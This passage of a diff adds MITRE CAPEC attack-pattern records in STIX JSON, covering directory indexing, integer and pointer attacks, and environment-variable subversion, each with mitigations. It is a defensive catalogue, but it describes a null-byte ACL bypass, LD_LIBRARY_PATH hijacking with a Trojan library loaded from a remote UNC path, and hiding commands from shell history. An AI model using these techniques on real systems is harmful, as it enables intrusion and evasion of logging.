"relationship--9efb30cd-a0e5-4666-998f-c9119096f678", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--da440d05-dc0e-4bfa-8490-7178ae419336", + "target_ref": "attack-pattern--faf0ec21-da60-4efc-8c8e-7a6b63bea170", + "type": "relationship", + 
"x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Run server interfaces with a non-root account and/or utilize chroot jails or other configuration techniques to constrain privileges even if attacker gains some limited access to commands.", + "id": "course-of-action--16c78c78-dace-4fe3-ac4a-aaf188d14af5", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-126-5", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--2aeb9107-ab93-4c87-b9c5-a7eabd78976b", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--16c78c78-dace-4fe3-ac4a-aaf188d14af5", + "target_ref": "attack-pattern--faf0ec21-da60-4efc-8c8e-7a6b63bea170", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Host integrity monitoring for critical files, directories, and processes. 
The goal of host integrity monitoring is to be aware when a security issue has occurred so that incident response and other forensic activities can begin.", + "id": "course-of-action--3c433a52-7784-4abd-b404-41fc8a423886", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-126-6", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--f7a2a574-4587-4e1f-83a1-69fa413c6fbb", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--3c433a52-7784-4abd-b404-41fc8a423886", + "target_ref": "attack-pattern--faf0ec21-da60-4efc-8c8e-7a6b63bea170", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Perform input validation for all remote content, including remote and user-generated content.", + "id": "course-of-action--b3379e8f-995d-4df7-be15-7861c104b55c", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-126-7", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--a6a7d0d3-2377-4fba-ba62-ba4c605a8206", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--b3379e8f-995d-4df7-be15-7861c104b55c", + "target_ref": 
"attack-pattern--faf0ec21-da60-4efc-8c8e-7a6b63bea170", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Perform testing such as pen-testing and vulnerability scanning to identify directories, programs, and interfaces that grant direct access to executables.", + "id": "course-of-action--8fb32cf0-80fd-4e8b-91c6-0908041d5b6e", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-126-8", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--99e79d18-12bf-4362-a63b-bbc4e4c958a5", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--8fb32cf0-80fd-4e8b-91c6-0908041d5b6e", + "target_ref": "attack-pattern--faf0ec21-da60-4efc-8c8e-7a6b63bea170", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Use indirect references rather than actual file names.", + "id": "course-of-action--f972cf8f-5c89-4e6c-87ad-8eb40c32883b", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-126-9", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--233f668e-d39a-47dd-8b8e-51d1e88576f6", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + 
"marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f972cf8f-5c89-4e6c-87ad-8eb40c32883b", + "target_ref": "attack-pattern--faf0ec21-da60-4efc-8c8e-7a6b63bea170", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Use possible permissions on file access when developing and deploying web applications.", + "id": "course-of-action--4dc38767-be73-424a-b909-90eb4773dfa3", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-126-10", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--048fb2e5-4985-4092-ab1f-ecb8bb25b6c2", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--4dc38767-be73-424a-b909-90eb4773dfa3", + "target_ref": "attack-pattern--faf0ec21-da60-4efc-8c8e-7a6b63bea170", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Validate user input by only accepting known good. 
Ensure all content that is delivered to client is sanitized against an acceptable content specification -- using an allowlist approach.", + "id": "course-of-action--eb88c845-46c6-4223-adf2-ac06a363bac2", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-126-11", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--d5c7f3e3-935d-41f4-b489-634a196c7864", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--eb88c845-46c6-4223-adf2-ac06a363bac2", + "target_ref": "attack-pattern--faf0ec21-da60-4efc-8c8e-7a6b63bea170", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary crafts a request to a target that results in the target listing/indexing the content of a directory as output. One common method of triggering directory contents as output is to construct a request containing a path that terminates in a directory name rather than a file name since many applications are configured to provide a list of the directory's contents when such a request is received. An adversary can use this to explore the directory tree on a target as well as learn the names of files. 
This can often end up revealing test files, backup files, temporary files, hidden files, configuration files, user accounts, script contents, as well as naming conventions, all of which can be used by an attacker to mount additional attacks.", + "external_references": [ + { + "external_id": "CAPEC-127", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/127.html" + }, + { + "external_id": "CWE-424", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/424.html" + }, + { + "external_id": "CWE-425", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/425.html" + }, + { + "external_id": "CWE-288", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/288.html" + }, + { + "external_id": "CWE-285", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/285.html" + }, + { + "external_id": "CWE-732", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/732.html" + }, + { + "external_id": "CWE-276", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/276.html" + }, + { + "external_id": "CWE-693", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/693.html" + }, + { + "description": "File and Directory Discovery", + "external_id": "T1083", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1083" + }, + { + "description": "WASC Threat Classification 2.0, 2010, The Web Application Security Consortium (WASC)", + "external_id": "REF-11", + "source_name": "reference_from_CAPEC", + "url": "http://projects.webappsec.org/Directory-Indexing" + } + ], + "id": "attack-pattern--62c46d1c-f091-467e-a4b0-61927db31f38", + "modified": "2021-06-24T00:00:00.000Z", + "name": "Directory Indexing", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + 
"attack-pattern--49132d37-44e8-458c-a06e-0e5b9ac9bbd6" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Read Data (Information Leakage)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n The adversary uses directory listing to view sensitive files in the application. This is an example of accessing the backup file. The attack issues a request for http://www.example.com/admin/ and receives the following dynamic directory indexing content in the response: Index of /admin Name Last Modified Size Description backup/ 31-May-2007 08:18 - Apache/ 2.0.55 Server at www.example.com Port 80\n The target application does not have direct hyperlink to the \"backup\" directory in the normal html webpage, however the attacker has learned of this directory due to indexing the content. The client then requests the backup directory URL and receives output which has a \"db_dump.php\" file in it. This sensitive data should not be disclosed publicly.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Directory Discovery: Use a method, either manual, scripted, or automated to discover the directories on the server by making requests for directories that may possibly exist. During this phase the adversary is less concerned with whether a directory can be accessed or indexed and more focused on simply discovering what directories do exist on the target.

  2. Techniques
    Send requests to the web server for common directory names
    If directories are discovered that are native to a server type further refine the directory search to include directories usually present on those types of servers.
    Search for uncommon or potentially user created directories that may be present.

Experiment

  1. Iteratively explore directory/file structures: The adversary attempts to access the discovered directories that allow access and may attempt to bypass server or application level ACLs by using manual or automated methods

  2. Techniques
    Use a scanner tool to dynamically add directories/files to include their scan based upon data obtained in initial probes.
    Use a browser to manually explore the website by issuing a request ending the URL in a slash '/'.
    Attempt to bypass ACLs on directories by using methods that known to work against some server types by appending data to the directory request. For instance, appending a Null byte to the end of the request which may cause an ACL to fail and allow access.
    Sequentially request a list of common base files to each directory discovered.
    Try multiple fuzzing techniques to list directory contents for directories that will not reveal their contents with a \"/\" request

Exploit

  1. Read directories or files which are not intended for public viewing.: The adversary attempts to access the discovered directories that allow access and may attempt to bypass server or application level ACLs by using manual or automated methods

  2. Techniques
    Try multiple exploit techniques to list directory contents for directories that will not reveal their contents with a \"/\" request
    Try other known exploits to elevate privileges sufficient to bypass protected directories.
    List the files in the directory by issuing a request with the URL ending in a \"/\" slash.
    Access the files via direct URL and capture contents.
    Attempt to bypass ACLs on directories by using methods that are known to work against some server types by appending data to the directory request. For instance, appending a Null byte to the end of the request which may cause an ACL to fail and allow access.
    Sequentially request a list of common base files to each directory discovered.
", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The target must be misconfigured to return a list of a directory's content when it receives a request that ends in a directory name rather than a file name.", + "The adversary must be able to control the path that is requested of the target.", + "The administrator must have failed to properly configure an ACL or has associated an overly permissive ACL with a particular directory.", + "The server version or patch level must not inherently prevent known directory listing attacks from working." + ], + "x_capec_resources_required": [ + "Ability to send HTTP requests to a web application." + ], + "x_capec_skills_required": { + "High": "To bypass the access control of the directory of listings", + "Low": "To issue the request to URL without given a specific file name" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "1. 
Using blank index.html: putting blank index.html simply prevent directory listings from displaying to site visitors.", + "id": "course-of-action--e159a65a-59f4-41fb-82a5-0f5cf069b10f", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-127-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--1d386aba-01fb-4a86-8b95-a4778cf497ab", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--e159a65a-59f4-41fb-82a5-0f5cf069b10f", + "target_ref": "attack-pattern--62c46d1c-f091-467e-a4b0-61927db31f38", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "2. 
Preventing with .htaccess in Apache web server: In .htaccess, write \"Options-indexes\".", + "id": "course-of-action--7c00c5ac-d08c-4abb-8ce7-7000072c9d15", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-127-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--665bc535-a6b1-48ea-9fd2-4cda3661f872", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--7c00c5ac-d08c-4abb-8ce7-7000072c9d15", + "target_ref": "attack-pattern--62c46d1c-f091-467e-a4b0-61927db31f38", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "3. 
Suppressing error messages: using error 403 \"Forbidden\" message exactly like error 404 \"Not Found\" message.", + "id": "course-of-action--778c2c99-3964-42e2-9e8a-33e9adf9201b", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-127-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--c93af142-fad4-470f-ab94-e6b35f993234", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--778c2c99-3964-42e2-9e8a-33e9adf9201b", + "target_ref": "attack-pattern--62c46d1c-f091-467e-a4b0-61927db31f38", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker takes advantage of the structure of integer variables to cause these variables to assume values that are not expected by an application. For example, adding one to the largest positive integer in a signed integer variable results in a negative number. 
Negative numbers may be illegal in an application and the application may prevent an attacker from providing them directly, but the application may not consider that adding two positive numbers can create a negative number do to the structure of integer storage formats.", + "external_references": [ + { + "external_id": "CAPEC-128", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/128.html" + }, + { + "external_id": "CWE-682", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/682.html" + } + ], + "id": "attack-pattern--1f3b920a-a706-494c-9486-69531a514912", + "modified": "2017-08-04T00:00:00.000Z", + "name": "Integer Attacks", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--71d31712-9174-4433-8e4f-8520a3ec1249" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_parent_of_refs": [ + "attack-pattern--369d69a3-fb4a-49ac-8999-9b4ecfbf74c6" + ], + "x_capec_prerequisites": [ + "The target application must have an integer variable for which only some of the possible integer values are expected by the application and where there are no checks on the value of the variable before use.", + "The attacker must be able to manipulate the targeted integer variable such that normal operations result in non-standard values due to the storage structure of integers." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." 
+ ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack pattern involves an adversary manipulating a pointer within a target application resulting in the application accessing an unintended memory location. This can result in the crashing of the application or, for certain pointer values, access to data that would not normally be possible or the execution of arbitrary code. Since pointers are simply integer variables, Integer Attacks may often be used in Pointer Attacks.", + "external_references": [ + { + "external_id": "CAPEC-129", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/129.html" + }, + { + "external_id": "CWE-682", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/682.html" + }, + { + "external_id": "CWE-822", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/822.html" + }, + { + "external_id": "CWE-823", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/823.html" + } + ], + "id": "attack-pattern--6295b7e2-98e9-4fc8-acbf-99769cb3cdf0", + "modified": "2019-04-04T00:00:00.000Z", + "name": "Pointer Manipulation", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_domains": [ + "Software" + ], + "x_capec_prerequisites": [ + "The target application must have a pointer variable that the attacker can influence to hold an arbitrary value." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." 
+ ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "The adversary directly or indirectly modifies environment variables used by or controlling the target software. The adversary's goal is to cause the target software to deviate from its expected operation in a manner that benefits the adversary.", + "external_references": [ + { + "external_id": "CAPEC-13", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/13.html" + }, + { + "external_id": "CWE-353", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/353.html" + }, + { + "external_id": "CWE-285", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/285.html" + }, + { + "external_id": "CWE-302", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/302.html" + }, + { + "external_id": "CWE-74", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/74.html" + }, + { + "external_id": "CWE-15", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/15.html" + }, + { + "external_id": "CWE-73", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/73.html" + }, + { + "external_id": "CWE-20", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html" + }, + { + "external_id": "CWE-200", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/200.html" + }, + { + "description": "Impair Defenses:Impair Command History Logging", + "external_id": "T1562.003", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1562/003" + }, + { + "description": "Hijack Execution Flow:Dynamic Linker Hijacking", + "external_id": "T1574.006", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1574/006" + }, + { + "description": "Hijack 
Execution Flow:Path Interception by PATH Environment Variable", + "external_id": "T1574.007", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1574/007" + }, + { + "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--f190e1b3-e8d6-4aef-817c-b3e7782e2aed", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Subverting Environment Variable Values", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_precede_refs": [ + "attack-pattern--c4a0c765-e4ca-43c2-996e-08ce13ae8f80" + ], + "x_capec_child_of_refs": [ + "attack-pattern--5e4a268e-f89f-445a-aa42-395922f56bf0" + ], + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism" + ], + "Accountability": [ + "Hide Activities" + ], + "Authorization": [ + "Bypass Protection Mechanism" + ], + "Availability": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Unreliable Execution" + ], + "Confidentiality": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Bypass Protection Mechanism", + "Read Data" + ], + "Integrity": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "Changing the LD_LIBRARY_PATH environment variable in TELNET will cause TELNET to use an alternate (possibly Trojan) version of a function library. The Trojan library must be accessible using the target file system and should include Trojan code that will allow the user to log in with a bad password. This requires that the adversary upload the Trojan library to a specific location on the target. 
As an alternative to uploading a Trojan file, some file systems support file paths that include remote addresses, such as \\\\172.16.2.100\\shared_files\\trojan_dll.dll. See also: Path Manipulation (CVE-1999-0073)", + "The HISTCONTROL environment variable keeps track of what should be saved by the history command and eventually into the ~/.bash_history file when a user logs out. This setting can be configured to ignore commands that start with a space by simply setting it to \"ignorespace\". HISTCONTROL can also be set to ignore duplicate commands by setting it to \"ignoredups\". In some Linux systems, this is set by default to \"ignoreboth\" which covers both of the previous examples. This means that \" ls\" will not be saved, but \"ls\" would be saved by history. HISTCONTROL does not exist by default on macOS, but can be set by the user and will be respected. Adversaries can use this to operate without leaving traces by simply prepending a space to all of their terminal commands." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Probe target application: The adversary first probes the target application to determine important information about the target. This information could include types software used, software versions, what user input the application consumes, and so on. Most importantly, the adversary tries to determine what environment variables might be used by the underlying software, or even the application itself.

Experiment

  1. Find user-controlled environment variables: Using the information found by probing the application, the adversary attempts to manipulate any user-controlled environment variables they have found are being used by the application, or suspect are being used by the application, and observe the effects of these changes. If the adversary notices any significant changes to the application, they will know that a certain environment variable is important to the application behavior and indicates a possible attack vector.

  2. Techniques
    Alter known environment variables such as \"$PATH\", \"$HOSTNAME\", or \"LD_LIBRARY_PATH\" and see if application behavior changes.

Exploit

  1. Manipulate user-controlled environment variables: The adversary manipulates the found environment variable(s) to abuse the normal flow of processes or to gain access to privileged resources.

", + "x_capec_likelihood_of_attack": "High", + "x_capec_peer_of_refs": [ + "attack-pattern--4a29d66d-8617-4382-b456-578ecdb1609e" + ], + "x_capec_prerequisites": [ + "An environment variable is accessible to the user.", + "An environment variable used by the application can be tainted with user supplied data.", + "Input data used in an environment variable is not validated properly.", + "The variables encapsulation is not done properly. For instance setting a variable as public in a class makes it visible and an adversary may attempt to manipulate that variable." + ], + "x_capec_skills_required": { + "High": "Some more advanced attacks may require knowledge about protocols and probing technique which help controlling a variable. The malicious user may try to understand the authentication mechanism in order to defeat it.", + "Low": "In a web based scenario, the client controls the data that it submitted to the server. So anybody can try to send malicious data and try to bypass the authentication mechanism." 
+ }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Protect environment variables against unauthorized read and write access.", + "id": "course-of-action--60c73cc1-5718-4246-a2a6-da180705e463", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-13-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--e351819c-a8ce-4628-bc2d-fe25172f524f", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--60c73cc1-5718-4246-a2a6-da180705e463", + "target_ref": "attack-pattern--f190e1b3-e8d6-4aef-817c-b3e7782e2aed", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Protect the configuration files which contain environment variables against illegitimate read and write access.", + "id": "course-of-action--88742f57-22ea-48b4-a8a8-aa72de425e08", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-13-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--f927e9e7-a3c2-4e14-8da4-37711f2f0161", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], 
+ "relationship_type": "mitigates", + "source_ref": "course-of-action--88742f57-22ea-48b4-a8a8-aa72de425e08", + "target_ref": "attack-pattern--f190e1b3-e8d6-4aef-817c-b3e7782e2aed", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Assume all input is malicious. Create an allowlist that defines all valid input to the software system based on the requirements specifications. Input that does not match against the allowlist should not be permitted to enter into the system.", + "id": "course-of-action--523a56cb-eaa5-451a-8ba9-f85b37fad844", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-13-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--9b2e048e-f266-4abc-a3e7-0430607e7aeb", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--523a56cb-eaa5-451a-8ba9-f85b37fad844", + "target_ref": "attack-pattern--f190e1b3-e8d6-4aef-817c-b3e7782e2aed", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Apply the least privilege principles. 
